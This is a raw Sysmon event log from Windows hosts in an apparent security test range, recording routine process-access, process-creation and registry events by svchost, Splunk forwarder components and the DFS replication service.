22:14:30.037{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033044Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.037{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033043Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.037{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033042Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.037{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033041Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.037{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-3746-6013-8803-00000000A401}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033040Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.037{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3746-6013-8803-00000000A401}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033039Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.038{FF16AF91-3746-6013-8803-00000000A401}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362561Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.815{8e433fbf-3747-6013-c503-000000001100}106166072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362560Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.659{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3747-6013-c503-000000001100}10616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362559Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.659{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362558Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.659{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362557Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.659{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362556Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.659{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362555Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.659{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-3747-6013-c503-000000001100}10616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362554Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.659{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3747-6013-c503-000000001100}10616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362553Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:31.660{8e433fbf-3747-6013-c503-000000001100}10616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033055Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3747-6013-8903-00000000A401}6976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033054Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033053Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033052Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033051Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033050Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-3747-6013-8903-00000000A401}6976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033049Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3747-6013-8903-00000000A401}6976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033048Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:31.350{FF16AF91-3747-6013-8903-00000000A401}6976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033076Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.850{FF16AF91-3748-6013-8B03-00000000A401}59525260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000033075Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-SetValue2021-01-28 22:14:32.803{FF16AF91-26C7-6013-3000-00000000A401}3584C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000033074Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-SetValue2021-01-28 22:14:32.787{FF16AF91-26C7-6013-3000-00000000A401}3584C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0C00DF61-BB0D-4388-B0BF-C892D3145944\Config SourceDWORD (0x00000001) 13241300x800000000000000033073Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-SetValue2021-01-28 22:14:32.787{FF16AF91-26C7-6013-3000-00000000A401}3584C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0C00DF61-BB0D-4388-B0BF-C892D3145944\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_0C00DF61-BB0D-4388-B0BF-C892D3145944.XML 10341000x800000000000000033072Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.693{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3748-6013-8B03-00000000A401}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033071Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.693{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033070Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 